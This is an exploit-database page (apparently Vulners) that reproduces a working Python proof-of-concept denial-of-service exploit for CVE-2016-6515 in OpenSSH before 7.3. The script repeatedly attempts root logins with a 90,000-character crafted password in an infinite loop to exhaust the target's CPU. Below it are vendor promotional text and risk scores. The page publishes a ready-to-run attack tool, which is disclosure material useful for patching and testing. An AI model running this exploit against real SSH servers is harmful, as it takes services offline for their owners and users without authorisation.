Vulners
Lucene search
OpenSSH 7.2 - Denial of Service Exploit
10
################################################################################
# Title : OpenSSH before 7.3 Crypt CPU Consumption (DoS Vulnerability)
# Author : Kashinath T ([email protected]) (www.secpod.com)
# Vendor : http://www.openssh.com/
# Software : http://www.openssh.com/
# Version : OpenSSH before 7.3
# Tested on : Ubuntu 16.04 LTS, Centos 7
# CVE : CVE-2016-6515
# Date : 20-10-2016
#
# NOTE:
# If the remote machine is installed and running OpenSSH version prior to 7.3,
# it does not limit the password length for authentication. Hence, to exploit
# this vulnerability' we will send a crafted data which is of 90000 characters
# in length to the 'password' field while attempting to log in to a remote
# machine via ssh with username as 'root'.
#
# For more info refer,
# http://www.secpod.com/blog/openssh-crypt-cpu-consumption
################################################################################
import sys
from random import choice
from string import lowercase
try:
import paramiko
except ImportError:
print "[-] python module 'paramiko' is missing, Install paramiko with" \
" following command 'sudo pip install paramiko'"
sys.exit(0)
class ssh_exploit:
def __init__(self):
"""
Initialise the objects
"""
def ssh_login(self, remote_ip):
try:
# Crafted password of length 90000
passwd_len = 90000
crafted_passwd = "".join(choice(lowercase)
for i in range(passwd_len))
# Connect to a remote machine via ssh
ssh = paramiko.SSHClient()
ssh.load_system_host_keys()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# calling connect in infinite loop
print "[+] Entering infinite loop"
while 1:
ssh.connect(remote_ip, username='root',
password=crafted_passwd)
except Exception, msg:
print "Error in connecting to remote host : ", remote_ip
print "Exception in : ssh_login method."
sys.exit(msg)
def main():
if len(sys.argv) != 2:
print "usage: python openssh_crypt_cpu_consumption_dos.py 192.168.x.x"
sys.exit()
# Calling ssh_connect
ref_obj = ssh_exploit()
ref_obj.ssh_login(sys.argv[1])
if __name__ == "__main__":
main()
# 0day.today [2018-01-10] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Dec 2016 00:00Current
7.8High risk
Vulners AI Score7.8
EPSS0.57667